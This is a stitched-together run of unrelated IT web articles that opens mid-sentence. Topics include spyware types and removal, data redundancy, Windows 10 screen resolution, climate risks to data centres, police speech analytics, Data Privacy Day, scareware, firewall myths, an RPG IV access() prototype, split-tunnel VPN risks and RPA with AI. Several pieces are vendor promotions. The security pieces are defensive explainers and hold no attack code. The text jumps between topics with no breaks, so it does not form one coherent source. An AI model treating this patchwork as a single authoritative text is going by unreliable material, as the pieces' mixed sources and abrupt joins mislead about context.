Thus, the danger in adware is the erosion of a user’s privacy, since the data captured by adware is accumulated with data captured about the user’s activity elsewhere on the internet. This information is then used to create a profile that can be shared or sold to advertisers without the user’s consent. 2. Trojan A trojan is a digital attack that disguises itself as desirable code or software. Trojans may hide in games, apps, or even software patches. They may also be embedded in attachments in phishing emails. Once downloaded by users, trojans can take control of victims’ systems for malicious purposes such as deleting files, encrypting files, or sharing sensitive information with other parties. 3. Keylogger A keylogger is a type of spyware that monitors user activity. When installed, keyloggers can steal passwords, user IDs, banking details, and other sensitive information. Keyloggers can be inserted into a system through phishing, social engineering, or malicious downloads. 4. System Monitor A system monitor captures virtually everything the user does on the infected computer or device. System monitors can be programmed to record all keystrokes, the user’s browser activity and history, as well as any form of communication, such as emails, webchats, or social media activity. 5. RedShell RedShell is a type of spyware that installs itself on a device whenever specific PC games are downloaded, in order to track online activity. Developers use this information as feedback to better understand their users and improve their games and marketing campaigns. 6. Rootkit Rootkits allow attackers to infiltrate a system while remaining almost undetectable. To infiltrate a system, they either exploit security vulnerabilities or log in as an administrator. 7. Tracking Cookies Websites, both legitimate and illegitimate, drop cookies onto your device to track users’ online activity. What Does Spyware Do?
This three-step process provides a general overview of how an author launches their spyware attack: - Infiltrate: Spyware may infiltrate any device when the user visits a malicious website, installs a malicious app, or even opens a file attachment in an email. - Monitor and capture: Once the spyware is installed, it begins to collect data, which could range from web activity and history to keystrokes. - Send or sell: The spyware creator collects the data and can either use it directly or sell it to third parties. The presence of spyware will generally slow down the computer or device, degrading its usability and functionality over time. Due to decreased functionality, the system may also be more vulnerable to other types of malware. How Spyware Infects Devices Spyware is commonly installed when the user unknowingly downloads it themselves. It is often hidden within seemingly legitimate websites or software, or delivered through vulnerability exploits. Some of the most common ways spyware infects devices: - Phishing and spoofing - Spyware hidden within software bundles - Downloading software from an unreliable source - Downloading malicious mobile apps - Opening email attachments or clicking links from unknown senders - Pirating media such as movies, music, or games - Agreeing to the terms and conditions of a program without carefully reading them - Accepting cookie consent requests from untrusted websites - Security vulnerabilities within a website or program What Are Examples of Issues Caused by Spyware on a Device? Once a system is compromised, the spyware begins to collect the user’s behavior data. Common tracking activities include: - Recording keystrokes (i.e., a keylogger) to gather anything that is typed, including user names, passwords, banking details, credit card numbers and contact information.
- Tracking online activity, including website visits, browsing history, people the user interacts with and messages they send, in order to create a detailed profile of the user. - Assuming control of the computer or device to reset the browser’s homepage, alter search results or flood the device with pop-up ads. - Reconfiguring the device’s security settings, including the firewall, to allow remote control over the device or to intercept attempts to remove the spyware. How to Protect Against Spyware Because any user’s device may become vulnerable to spyware, it is important to understand how to protect oneself. The first line of defense is to prevent spyware from being installed onto your device in the first place, and this can be achieved by being cautious about your own behavior while online. - Use reputable antivirus software with spyware protection, preferably a cloud-native security solution. - Use a pop-up blocker or avoid clicking pop-up ads. - Keep your computer or mobile operating systems updated. - Never open unsolicited or suspicious email attachments from unverified senders. - Don’t click links in text messages from unknown senders. - Be cautious about consenting to website cookies. - Be wary of free software and make sure to carefully read the terms and conditions. - Put a screen lock on your smartphone and use strong passwords on all devices. - Avoid using unsecured Wi-Fi, or use a VPN. - Look carefully at the permissions you grant apps when you install them. How to Remove Spyware Removing Spyware From Your Computer If you notice signs of a spyware infection on your desktop or laptop computer, take these steps to remove it: - Download and run a virus removal tool. Make sure the antivirus software is advanced so it can scan for all kinds of threats. - Once the system is cleared, consider contacting your financial institutions to inform them about possible fraudulent activity.
- If any stolen information is sensitive then you may want to contact local law-enforcement authorities to report potential violations of federal and state laws. - Once you’ve cleaned your system, consider downloading anti-spyware tools to further protect your devices from spyware in the future. Removing Spyware From Your Mobile Phone If you notice signs of a spyware infection on your mobile device, take these steps to remove it: - Uninstall apps you don’t recognize. Go to your phone’s settings, click on “Apps,” and uninstall any suspicious apps. - Run an antivirus or malware scan: You may have an app that came installed with your phone, or you may need to download and install a reputable app from the official app store for your device. - If the steps above do not solve the issue, you can back up your data then factory reset your phone. Data can be uploaded onto Google or iTunes/iCloud so you’ll be able to restore all your data to your freshly cleaned phone after resetting it. A factory reset removes all data and downloaded programs from the device and leaves it in its original ‘factory’ state. - Run a second antivirus or malware scan after you reinstall your data. Sometimes the first scan does not completely remove spyware.
IT excels at copying data. It is well known that organizations are storing data in volumes that continue to grow. However, most of this data is not new or original; much of it is copied data. For example, data about a specific customer can be stored in a transactional system, a staging area, a data warehouse, several data marts, and in a data lake. Even within one database, data can be stored several times to support different data consumers. Additionally, redundant copies of the data are stored in development and test environments. But business users also copy data. They may have copied data from central databases to private files and spreadsheets. The growth of data is enormous within organizations, but a large part consists of non-unique, redundant data. In addition to all these intra-organizational forms of data redundancy, there is also inter-organizational data redundancy. Organizations exchange data with each other. In almost all of these situations, the receiving organizations store the data in their own systems, resulting in more copies of the data. Especially between government organizations, a lot of data is sent back and forth. Some redundant data is not stored in its original form but in an aggregated or compressed form. For example, many data marts contain somewhat aggregated data, such as individual sales transactions aggregated by the minute. Data used to be stored multiple times for a variety of compelling reasons, but database server performance and network speed have improved enormously, making such redundancy needless in most cases. Unfortunately, new data architectures are still designed to store data redundantly. Some data infrastructures are just overloaded with data lakes, data hubs, data warehouses, and data marts. We think too casually about copying data and storing it redundantly.
We create redundant data too easily, which leads to five drawbacks:

- Change Control Issues: When source data is changed, how can we guarantee that all of the copies, stored in internal IT systems, in business users' files, and by other organizations, are changed accordingly and consistently? This is very difficult, especially if there is no overview of which copies exist, internally and externally.

- Compliance Struggles: Storing data in multiple systems complicates complying with the GDPR. As JT Sison writes: "An important principle in the European Union's General Data Protection Regulation (GDPR) is data minimization. Data processing should only use as much data as is required to successfully accomplish a given task. Additionally, data collected for one purpose cannot be repurposed without further consent." Implementing the "right to be forgotten" becomes much more complex when customer data is scattered across many databases and files. And if data has been stored that many times, do we even know where all the copies are?

- Manual Labor Woes: The more often data is stored redundantly, the less flexible the data architecture. If the source data definition changes, all of the copies also need to be changed. For example, if the data type of a column changes, or if the codes used to identify certain values change, updating all of the copies is an enormous undertaking.

- Data-Access Slowdowns: The fourth drawback relates to data latency. Accessing copied data means working with non-real-time data. The frequency of copying largely determines the data latency: the lower the frequency, the higher the latency. In some situations the copying process itself takes hours, which increases latency further. Data latency becomes very high when data is copied multiple times before it becomes available for usage.

- Data Quality Challenges: Finally, copying data can also lead to incorrect data, causing data quality issues.
Processes that copy data can crash midway, leaving the target data store in an unknown state. To fix this, data may need to be unloaded and reloaded, and this frequent unloading, fixing, and reloading can itself lead to incorrect data: some data may be loaded twice, not loaded at all, or loaded incorrectly. Each copying process introduces a potential data quality leak.

The Way Forward

Data minimization should be a guiding principle for any new data architecture. This applies to redundant data storage within an organization, but also to inter-organizational data flows. Data should not be sent to other organizations periodically; organizations should request the data when they need it, without having to store it themselves. In this respect, data should be available just like video-on-demand. We do not have to download and copy a video just to view it; when we want to watch it, it is simply streamed to us. Similarly, data should not be unnecessarily copied, and data minimization should be our guiding principle. Data infrastructures should offer data-on-demand to internal and external users.
You can adjust the screen resolution to change the image quality on the screen. In Windows 10, users can choose any available resolution on their own, without third-party programs.

Screen resolution is the number of pixels displayed horizontally and vertically. The higher the resolution, the clearer the picture. On the other hand, a high resolution places a serious load on the processor and video card, since more pixels have to be processed and displayed than at a lower resolution. If the computer cannot cope with that load, it starts to freeze and throw errors, so in that case it is recommended to lower the resolution to improve the device's performance.

It is worth considering which resolution suits your monitor. First, every monitor has a ceiling above which it cannot go. For example, if the monitor's maximum resolution is 1280×1024, setting anything higher will not work. Second, some resolutions may appear blurry if they do not fit the monitor: even if you set a higher but unsuitable resolution, there will be more pixels, but the picture will only get worse. Each monitor has its own optimal resolution.

As a rule, as the resolution increases, all objects and icons become smaller. This can be compensated for by adjusting the size of icons, text, apps and other elements in the system settings. If several monitors are connected to the computer, you can set a different resolution for each of them.

This guide will tell you how to determine the current screen resolution and set the appropriate value for your monitor.

How to Find Out the Established Resolution

To find out what resolution is currently set, just follow these steps:

1. Right-click in an empty area of the desktop and select the option "Display Settings".
2. The window that opens indicates what resolution is currently set.
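The "fit the monitor" point can be made concrete with a small helper that, given a monitor's supported modes, picks the largest mode that does not exceed a requested resolution. This is an illustrative sketch only; the mode list is hypothetical, and this is not how Windows itself selects modes:

```python
def best_fit(requested, supported):
    """Return the largest supported (width, height) mode that does not
    exceed the requested resolution in either dimension."""
    rw, rh = requested
    candidates = [(w, h) for (w, h) in supported if w <= rw and h <= rh]
    if not candidates:
        raise ValueError("no supported mode fits the request")
    # Prefer the mode with the most pixels among those that fit.
    return max(candidates, key=lambda wh: wh[0] * wh[1])

# Hypothetical mode list for a 1280x1024 panel.
modes = [(800, 600), (1024, 768), (1280, 1024)]
print(best_fit((1280, 1024), modes))  # the panel's native maximum
print(best_fit((1920, 1080), modes))  # clamped: cannot exceed the panel
```

Both calls return (1280, 1024): asking for more than the panel supports simply clamps to the largest mode that fits, which mirrors why "setting a higher resolution will not work."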
Find Out the Native Monitor Resolution If you want to know which resolution is the maximum or native to the monitor, then there are several options: - Using the method described above, go to the list of possible resolutions and look for the value “recommended” in it, it is native; - Find on the Internet information about the model of your device if you use a laptop or tablet, or monitor model when working with a PC. Usually more detailed data are given on the product manufacturer’s website; - See the instructions and documentation that came with your monitor or device. Perhaps the information you need is on the product box. How to Adjust Screen Resolution in Windows 10 There are several ways to change the resolution. You do not need third-party programs to do this, just the standard Windows 10 tools are enough. After you set a custom new resolution, the system will show how it will look for 15 seconds, after which a window will appear in which you will need to indicate whether to apply the changes or return to the previous settings in Windows. The simplest way is to use system parameters 1. Open Settings in Start Menu. 2. Go to the “System” block. 3. Select the “Display” sub-item. Here you can specify the resolution and scale for the existing screen or configure new monitors. You can change the orientation, but this is only required for non-standard monitors. Consider Using Action1 to Determine Screen Resolution if: - You need to perform an action on multiple computers simultaneously. - You have remote employees with computers not connected to your corporate network.
Climate change is impacting more than our wildlife and natural resources. The changing weather can compromise our data centers and lead to numerous performance issues that are both costly and inconvenient. In an increasingly digital world, protecting our data centers is necessary to maintain operations and keep businesses that rely on online networks and servers running successfully. From prolonged heat waves to increasingly severe storms, climate change is causing many challenges for the online world of information technology. Learning about the impacts of climate change on data centers and how to combat these issues is essential.

Weather and Data Centers

Changing weather patterns are causing uncertainty for digital industries and data center management. Climate change creates the following extreme weather conditions that can negatively impact data centers:

- Higher temperatures: According to the National Oceanic and Atmospheric Administration (NOAA), 2021 was Earth's sixth hottest year on record. Since 1981, the rate of warming has more than doubled. Increasing temperatures can contribute to worsening natural disasters, ranging from deadly heat waves to droughts.
- Flooding: Because burning fossil fuels is making Earth's atmosphere increasingly warmer, the hotter air can hold more water vapor and produce heavy rain showers. Even regions away from water sources can face high flood risks because of these downpours.
- Humidity: Hotter weather also means higher humidity. Alongside the rising temperatures, the planet has seen a rise in moisture of about four percent for every degree Fahrenheit that the world warms.
- Wildfires: Climate change contributes to larger and faster-spreading wildfires that have devastated thousands of miles of forests over the last few years. Russia alone saw a 31% increase in fire-related losses in 2021 because of prolonged heat waves driven by the hotter climate.
- Droughts: Rising average temperatures are speeding up the planet's water cycle, evaporating water more quickly from plants and soil. From 2000 to 2020, about 20% to 70% of the U.S. experienced abnormally dry conditions.
- Severe storms: As Earth's global surface temperatures increase, more intense storms are likely to occur, often accompanied by stronger winds and heavier rain or snowfall.

How Climate Change Affects Data Centers

Explore how data centers are affected by weather changes due to rising surface temperatures.

Power outages are one of the most devastating effects of climate change on data centers. Severe weather can strain the power grid infrastructure, which is already struggling to meet demands in the United States. In addition to causing downtime, power outages can cause the following problems for your data center:

- Data loss: Your business could lose valuable data if hard drives and servers fail during an outage.
- Corrupted files: A sudden loss of power can corrupt your files or leave them only partially processed.
- Damaged equipment: Power grid failures can disrupt and damage your data center equipment.

Performance Issues and Disruptions

High temperatures and severe weather caused by climate change can interfere with your data center's performance. Data center equipment often requires cooling gear to maintain a safe operating temperature for reliable deployment. The stress of above-normal temperatures can overwork cooling equipment, leading to failure. While most data centers can withstand the impacts of typical severe weather, serious conditions such as prolonged heat waves or extreme flooding caused by climate change can cause untimely disruptions that data centers cannot withstand.

Downtime and Unplanned Costs

One of the most harmful impacts of climate change on data centers is unplanned downtime.
Pausing your operations can come with a price tag because of the associated costs, including:

- Reduced productivity: If your business relies on online servers and networks, downtime impacts your team's ability to access their work and halts productivity.
- Data loss: Disruptions and downtime can lead to corrupted files and make your data center vulnerable to costly cyberattacks.
- Lost sales: If your operation performs online business, downtime can prevent customers from making purchases, which ultimately impacts your profitability.
- Compensation for lost services: If you offer customers compensation for unplanned service interruptions, these costs can add up quickly.
- Equipment repairs: When severe weather damages your equipment, you may face downtime while addressing the necessary repairs and component replacements.
- Backup generators: Investing in backup power sources is beneficial to reduce downtime and keep your operations up and running.
- Lost reputation: Downtime can hurt your company's reputation. Providing reliable services is crucial to customer loyalty and to establishing your services as dependable.

Planning for the Unexpected

The key to combating the negative effects of climate change on data centers is preparing for the unplanned. Here are a few ways your business or organization can address the high temperatures and severe weather associated with the changing climate.

Meet Your Cooling Needs

Fighting heat and humidity is crucial for keeping data center equipment functioning at its best. Your business needs effective cooling systems to avoid overheating, which shortens your data center equipment's life span. The right solutions should help:

- Improve airflow.
- Maintain an optimal environment.
- Reduce energy costs.

Finding the right cooling systems will keep your equipment operating at its best and extend its life, helping your business maximize its investments and enjoy more uptime.
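Looping back to the downtime costs listed above, a back-of-the-envelope estimator shows how quickly they stack up. Every figure and the simple formula itself are hypothetical, not industry benchmarks:

```python
def downtime_cost(hours, hourly_revenue, staff, hourly_wage,
                  repair_cost=0, credits=0):
    """Rough estimate of an outage's direct cost:
    lost sales + idle payroll + equipment repairs + service credits."""
    lost_sales = hours * hourly_revenue
    idle_payroll = hours * staff * hourly_wage
    return lost_sales + idle_payroll + repair_cost + credits

# Hypothetical 4-hour outage: $5,000/hr in online sales, 20 idled staff
# at $40/hr, $2,500 in equipment repairs and $1,000 in customer credits.
print(downtime_cost(4, 5000, 20, 40, repair_cost=2500, credits=1000))  # 26700
```

Even this simplified model ignores the harder-to-quantify items above, such as lost reputation, so real outage costs are typically higher still.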
Find Adequate Power Solutions Every data center requires an uninterruptible power system to combat downtime and boost system reliability. As the digital world continues growing rapidly and climate change increasingly threatens information technology’s stability, arming data centers with the right power solutions can give your business peace of mind. In addition, consider the need for backup generators to minimize unplanned downtime and keep your data center functioning in the face of severe weather. Create a Disaster Recovery Plan With the growing threat of severe weather caused by climate change, organizations should craft a plan of action for unexpected events to maintain uptime. Decide how your business will respond to issues such as power outages or physical damage so you can streamline recovery and get back to normal operations as soon as possible. Choose DataSpan to Protect Your Data Center For almost 50 years, DataSpan has provided our customers with the technology solutions they need to optimize their data centers. Our experienced team is here to help bring your data center to the next level, no matter what happens in the future. From infrastructure to support, we can help your business with data center IT services and storage to help you combat the unexpected and improve your business’s data management. More than half of the Fortune 1000 trust us with their IT operations. Contact DataSpan to learn more about our data center solutions.
- A recent study at the University of Michigan suggests that attention and short-term memory processing are directly affected by a person's surroundings and environment, with noisy environments significantly reducing memory performance.
- The human brain can only hold about seven pieces of information for less than 30 seconds.

With those two facts in mind, one can only imagine how tough it can be for call handlers in the police force to gain a comprehensive understanding of a situation and pick up on distress signals. Dealing with over 21,000 calls a day, the police force is a highly pressurised environment where speed, accuracy and the ability to capture important information and signs of distress are imperative. Failing to do so could not only jeopardise the safety of the caller, it could also result in a loss of public trust and of potential further funding.

How can Speech Analytics help you protect your call handlers, serve the public and control operational costs?

Speech Analytics technology is capable of quickly searching through live (real-time) and historic calls and highlighting those that fit pre-established criteria. Real-Time Speech Analytics automatically captures and analyses the entire call interaction as it unfolds, to uncover information that is potentially 'hidden between the lines', by isolating specific words, phrases and tone of voice. Thanks to a sophisticated linguistic analytics module, it identifies keywords and phrases and picks up information from all aspects of the conversation. Furthermore, it takes into account additional caller and contextual information before making its next-best-action recommendation.

Why is this important? The police force receives over 21,000 calls every day, 25% of which are characterised as urgent.
Real-Time Speech Analytics acts as a second pair of ears, picking up on and alerting call handlers to issues that could otherwise be missed due to factors like noise, line quality, or the accent and articulation of the caller. These details can be of extreme importance when trying to distinguish between an emergency and a non-emergency call and when ensuring that further action is based on correct data.

Speech Analytics also scans historic calls and interviews to help identify drivers, highlight recurring trends and even locate historic recordings based on newly established intelligence. Moreover, using Speech Analytics to evaluate historic calls can contribute to improving processes and making training more effective. As a training tool, Speech Analytics eliminates the need for random call selection by finding the right calls to support more targeted and tailored training. By training call handlers to pick up on important cues and to handle calls in a more efficient and professional manner, the chances of customer complaints and of failing the duty of care decrease.

With Speech Analytics, police force control rooms have the opportunity to:

- Achieve compliance adherence by ensuring call handling protocols are being met
- Meet targets with greater process efficiency and reduced costs
- Find relevant calls for training and improved processes
- Increase crime intelligence and act on calls more efficiently for better results
- Minimise repeat calls by understanding the root cause of callbacks

Check out our Speech Analytics Advice Hub for more information on this game-changing technology.
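The keyword-and-phrase spotting described above is easy to illustrate. Here is a toy sketch that flags a call transcript containing any phrase on a watch list; the phrase list is hypothetical, and a real system would also weigh tone of voice, context and caller data:

```python
import re

# Hypothetical watch list of distress phrases.
WATCH_PHRASES = ["can't breathe", "he has a knife", "help me", "break in"]

def flag_call(transcript: str) -> list:
    """Return the watch-list phrases found in a call transcript."""
    found = []
    lowered = transcript.lower()
    for phrase in WATCH_PHRASES:
        # Word boundaries keep "help me" from matching inside other words.
        if re.search(r"\b" + re.escape(phrase) + r"\b", lowered):
            found.append(phrase)
    return found

hits = flag_call("Please help me, I think someone is trying to break in.")
print(hits)  # ['help me', 'break in']
```

A non-empty result would trigger an alert to the call handler, which is the "second pair of ears" behaviour in its simplest possible form.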
In a very interconnected world, it's imperative that we remember to safeguard our data security. The National Cyber Security Alliance (NCSA), the organization that heads Cyber Security Awareness Month each October, has been leading an effort to raise awareness of this issue since 2011, but its history goes back to 1981.

Data Privacy Day began in the United States and Canada in January 2008 as an extension of the Data Protection Day celebration in Europe. Data Protection Day commemorates the Jan. 28, 1981, signing of Convention 108, the first legally binding international treaty dealing with privacy and data protection. Data Privacy Day is now a celebration for everyone, observed annually on Jan. 28. The National Cyber Security Alliance assumed leadership of Data Privacy Day from the Privacy Projects in August 2011. A nonprofit, public-private partnership dedicated to promoting a safer, more secure and more trusted Internet, NCSA is advised by a distinguished advisory committee of privacy professionals.

So, what can you do to get involved? The Alliance offers a couple of suggestions:

- At work, encourage a culture that respects and values data privacy. Teach employees how easily privacy breaches can occur with negligent internet use in the workplace, and what the impact can be on the company. Review data security best practices that can help prevent malicious software from entering the network. Share the NCSA infographic called Privacy is Good for Business.
- At home, talk with your kids about safe internet use. Read a list of tips for parents here. It will probably be a good refresher for adults as well, because poor internet security practices are easy to slip into.

And finally, here are a few tips they provide for ensuring privacy in the workplace. Personal information may be valuable to your business, but it's also something your customers value.
Consider taking the following actions to create a culture of respecting privacy, safeguarding data and enabling trust in your organization:

- If you collect it, protect it. Follow reasonable security measures to protect individuals' personal information from inappropriate and unauthorized access.
- Be open and honest about how you collect, use and share personal information. Clearly communicate your privacy practices and any tools you offer consumers to manage their data. Don't count on your privacy notice as your only tool to educate consumers about your data practices; communicate clearly and often to the public about what privacy means to your organization and the steps you take to achieve and maintain privacy and security.
- Create a culture of privacy in your organization. Educate employees about their role in privacy and security, and in respecting and protecting the personal information of colleagues and customers.
- Conduct due diligence and maintain oversight of partners and vendors. You are also responsible for how they collect and use personal information.

We take data security seriously at Great Lakes Computer. We offer a range of services, like antivirus, cloud computing, and digital forensics, that can help you protect your most valuable asset: your information. If you feel you don't have the level of protection you need, contact us today.
What is Scareware: You've probably seen the pop-ups: "Warning! A virus has been detected on your computer. Download VirusBlaster to clean and remove it." The malware that infects your computer is the program that the pop-up is trying to trick you into downloading. Scareware can come in a variety of forms, from fake antivirus programs to fake browsers or software updates.

What makes protection a challenge: We know that social engineering works because it preys on the distracted and mentally fatigued. Combine that with an eagerness to please or help, and thus begins the "good intentions" downward spiral that leads employees to make terrible decisions. Once scareware gets inside the system, it has all the privileges, passwords, and logins of the employee who installed it. Getting it out may be as easy as wiping the system and starting fresh or recovering from backup. Or it may be more difficult and time-consuming if the malware spreads to other systems.

Want to discuss it further? Contact us today!

COMMON SECURITY THREATS SERIES

Learn about other security threats you might be up against:
By now, most people understand the importance of staying safe when browsing the Internet. Without proper anti-virus programs and firewall support, the infrastructure of any establishment can come crumbling to the ground. But before you invest in any type of firewall support, it’s important to know the facts, and there are countless misconceptions about web security floating around. Here are some of the most common myths about firewalls. Firewalls and virus protection programs are one and the same. Many people are under the impression that firewalls and virus protection programs are synonymous terms. While they do fall under the general umbrella category of Internet security, it’s important to make the distinction that viruses can indeed pass through a firewall. Viruses can sometimes penetrate and even shut down firewalls too, so it’s best to install a virus protection program in addition to running a firewall. Working with professional firewall consultants can help you determine your business’ security needs. Outside threats are the only type that an IT infrastructure needs protection against. This is a very popular yet untrue claim; surprisingly, an IT infrastructure can be attacked from the inside as well as the outside. More than half of survey respondents say their organization currently transfers sensitive or confidential data to the cloud, and many people would be shocked to find out just how common internal risks are. Reaching out to firewall experts is the best way to discover your IT infrastructure’s internal threats. Firewalls are guaranteed to work as intended. As with any type of digital hardware or software, the effectiveness of a firewall cannot be guaranteed. There will always be dark web users who find devious ways of breaking through even the best firewalls. 
This doesn’t mean you should give up hope of securing your IT infrastructure; rather, it should serve as a perpetual reminder to prioritize cybersecurity and reach out to firewall specialists to help optimize your digital security system and offer as much protection as possible. Ultimately, being aware of these common firewall misconceptions can help you make the most logical decisions regarding your company’s Internet security. If you’re in need of high-quality digital security equipment, consider Meraki, which had an installed base of 160,000 customers at the end of 2016 and 2 million devices connected globally. For more information about Meraki equipment, contact Manhattan Tech Support.
Intelligence-Led Cyber Defense

A sound defence needs more than technology. Alongside advancements in machine learning and artificial intelligence, there remains a vital role for human insight and ability. At heart, cyber is a field of conflict: a contest over access to data. To allocate resources effectively and win that fight, defenders need to consider the attacker's perspective. Only by understanding what is under threat and what the likely attacks are can defenders allocate defences effectively. Ideal for technical leaders explaining priorities to non-technical managers, this webinar draws on widespread offensive techniques to discuss how to understand, assess, and defend against cyber-attack, and how best to develop a defensive strategy.
Many people are using the Integrated File System (IFS) to store source code and HTML pages and to stage converted database files that are being sent or received between heterogeneous systems. Now, with OS/400 V5R2's "Type 2" IFS files, using the IFS is much less of a performance issue than before.

One question I am frequently asked is how to determine if a file exists on the IFS. There are several methods to accomplish this, but probably the easiest and safest way is to call the access() procedure. The C runtime function access() allows you to test a file on the IFS for read/write access or existence. The IFS API manual tells us that the access() procedure is prototyped, in C, as follows:

int access(const char *path, int amode);

This C prototype doesn't do us much good in RPG; we need to convert it to an RPG IV prototype. Illustrated below is the RPG IV prototype for the access() procedure:

D access          PR            10I 0 ExtProc('access')
D  szIFSFile                      *   Value OPTIONS(*STRING)
D  nAccessMode                  10I 0 Value

The access() procedure returns 0 if the test succeeds. For example, if you check for file existence and the file exists, 0 is returned. Of course, to check for the existence of a file, you have to tell the access() procedure what you want to do. To do that, you specify the type of file access you want on the second parameter. The options for the second parameter are as follows:

D R_OK            C                   Const(4)
D W_OK            C                   Const(2)
D F_OK            C                   Const(0)

It is always better programming to use named constants rather than hard-coded numbers, hence the R_OK, W_OK, and F_OK named constants. If you read the access() documentation, you will see that the C language predefines these constants for you (in C, of course). For example, to check whether the file CUSTMAST.TXT exists in the /MYFILES directory, you could use the following:

D szIFSFile       C                   Const('/MYFILES/CUSTMAST.TXT')
C                   if        access(szIFSFile : F_OK) = 0
C* The file exists!!
C                   endif

In this example, the IFS file name is stored as a named constant (line 1), and on line 2, the access() procedure is called to test for its existence.
If the file is found, a 0 is returned and processing continues. As is always the case, to use any of the C runtime library functions, you must include the QC2LE binding directory. As a matter of practice, I always include it in the H-spec of my source code. Here's a typical header specification from one of my source members:

H BNDDIR('QC2LE')

Bob Cozzi has been programming in RPG since 1978. Since then, he has written many articles and several books, including The Modern RPG Language--the most widely used RPG reference manual in the world. Bob is also a very popular speaker at industry events such as RPG World and is the author of his own Web site and of the RPG ToolKit, an add-on library for RPG IV programmers.
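As an aside, the same POSIX access() API that this article wraps in RPG IV is exposed directly by other languages' runtimes as well. Python's os.access(), for instance, takes the same mode constants, so the existence check looks nearly identical:

```python
import os
import tempfile

# os.F_OK / os.R_OK / os.W_OK mirror the F_OK, R_OK and W_OK constants above.
with tempfile.NamedTemporaryFile() as f:
    print(os.access(f.name, os.F_OK))       # True: the file exists
print(os.access("/no/such/file", os.F_OK))  # False: it does not
```

The return convention differs (Python returns a boolean rather than 0 on success), but the underlying test is the same system call.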
What You Need to Know About Split Tunneling

Today's modern networks require flexibility to allow workers to work from multiple locations. One of the most common methods to achieve remote network access is a Virtual Private Network (VPN). VPNs come in all shapes and sizes, from hosted to on-premises to cloud-based, and can be built to fit all needs. However, one topic that is often overlooked is whether or not to allow VPN users to utilize split tunneling.

Webopedia defines split tunneling as "The process of allowing a remote VPN user to access a public network, most commonly the Internet, at the same time that the user is allowed to access resources on the VPN." The idea is that the user has a tunnel to the corporate network for accessing apps or shared drives through the VPN connection, while still using the remote user's local internet connection for access to the web and local resources.

In terms of security, enabling split tunneling means you now have an open connection to your network that can send and receive traffic which does not pass through your organization's perimeter security devices, such as a firewall, IPS or IDS. This creates a situation where your organization cannot monitor web traffic on the remote device through the VPN connection.

Utilizing a split tunnel can also increase the possibility of data exfiltration out of the organization. If controls are in place to prevent copying and pasting of data, those controls may now be ineffective because traffic is being sent outside of the organization's Data Loss Prevention (DLP) system. While it is certainly possible for this to occur with a full VPN tunnel, the task of preventing that data loss becomes much more difficult with a split tunnel.

Another potential loss of security stems from the remote VPN user utilizing a public Internet connection: that user's web traffic would not be encrypted by a VPN tunnel.
As a result, any data not sent over the VPN can be susceptible to snooping if an unsecured protocol is used.

How to Mitigate the Risk of Split Tunneling

Protections to mitigate the risk of split tunneling should include, first and foremost, a valid BAA, which requires third parties to verify that remote workstations are protected. For internal employees and contractors, a signed Acceptable Use Policy (AUP) should outline the acceptable use of equipment. Secondly, employers should provide training that demonstrates the acceptable and unacceptable uses of the device.

As far as technical controls, a VPN agent that can perform a health check and verify the device is compliant should be implemented. This health check should verify that operating system patches are installed and that antivirus software is installed, running and updating regularly.

Additionally, it is common practice to place a firewall in front of the VPN traffic; however, this firewall is generally not as robust as the perimeter firewall. A VPN firewall is the only protection for your network against malicious traffic traversing that VPN tunnel. Properly configured, it will protect your network against malicious VPN traffic, but it is a single layer of defense. As IT security becomes more prominent, it is common practice to implement multiple layers of defense to prevent a data breach.

One of the most effective protections an organization can implement is strong network segmentation. Remote users should be limited to accessing only the systems required to perform their job functions. Restrictions should be in place to segment your network and prevent unlimited network access for remote users. All too often, our security professionals see remote-access VPNs that allow complete, unrestricted network access.
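The deny-by-default segmentation just described can be sketched as a simple allow-list; the role names and internal hostnames are invented for illustration:

```python
# Illustrative deny-by-default segmentation policy for remote VPN users.
# Role names and internal hostnames are invented for this sketch.
ALLOWED_SYSTEMS = {
    "accounting": {"erp.internal", "fileshare.internal"},
    "developer": {"git.internal", "ci.internal"},
}

def may_connect(role: str, host: str) -> bool:
    """Permit only the systems a role needs; deny everything else."""
    return host in ALLOWED_SYSTEMS.get(role, set())

print(may_connect("accounting", "erp.internal"))  # needed for the job
print(may_connect("accounting", "git.internal"))  # out of scope, denied
print(may_connect("contractor", "erp.internal"))  # unknown role, denied
```

The design choice that matters is the default: an unknown role or host maps to an empty set, so access must be explicitly granted rather than explicitly revoked.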
Segmenting VPN connections to access only the required systems is paramount to creating a strong security posture. A strong network-wide segmentation practice can be the deciding factor in whether a company experiences a minor breach or a massive one.

Split tunneling has its benefits. A split-tunnel VPN gives the remote user the fastest web browsing speed, since they can use the ISP they're connected to instead of sending that traffic back through the business's network. From a network standpoint, it decreases the bandwidth used by VPN traffic, as only business functions are sent over the VPN while other traffic flows directly through the remote user's ISP connection. And remote workers can print to their local network printer while connected to the VPN, a minor issue but one we often hear about.

Is Split Tunneling Compatible with the HITRUST Framework?

As HITRUST Assessors, we are often asked whether split tunneling is allowed for remote VPN connections. HITRUST does have a specific requirement prohibiting split-tunnel VPNs (a Domain 8 requirement: remote devices establishing a non-remote connection are not allowed to communicate with external (remote) resources). But this requirement is not common in Cyber Security Framework 9.2 assessments and is only applicable to larger organizations.

So the decision to allow a split-tunnel VPN boils down to a few things. One, is there a legal or compliance requirement that must be satisfied? Two, does the reward of a split-tunnel VPN outweigh the risk? And three, how much do you trust the employees, contractors or vendors who may be utilizing that split-tunnel VPN? Once an organization answers these three questions, it can determine whether a split-tunnel VPN works for it.

By Josh Perri, Intraprise Health Information Security Consultant
Given their inherent similarities, it's entirely logical that robotic process automation and artificial intelligence would have crossover in a variety of different contexts. Both of these technologies are contingent upon bringing order to processes - usually workflows, in either the physical or digital realm - that might otherwise run the risk of falling into disorder for any number of reasons, most notably human error. RPA and AI are perfectly capable of operating on their own, and in fact often do. Yet recent evidence suggests systems in which the two automation-focused methods work together may become increasingly common in the not-too-distant future.

RPA and AI are working alongside each other in various business applications. Organizations considering implementing one or the other to manage any of their operations would serve themselves well by examining how they're being used in tandem. It's also worth investigating how a versatile low-code business application development platform like Appian may be ideal for creating tools to most successfully leverage symbiotic RPA and AI.

According to InformationAge, it can often be easier for most organizations to implement RPA in advance of AI, especially in instances where they are still reliant to some degree on legacy systems: hardware, software or both. Complete overhauls of companies' existing tools for business process management in favor of more advanced technologies are quite difficult, as they can't be accomplished quickly - and, in some instances, aren't realistic at all. The better approach, then, is to use the addition of something like RPA as a table-setter for more substantive changes to operating methods. With that being said, the increasing frequency with which RPA and AI are coming as a package deal means BPM advancements or overhauls won't be quite as complex to manage in the next few years.
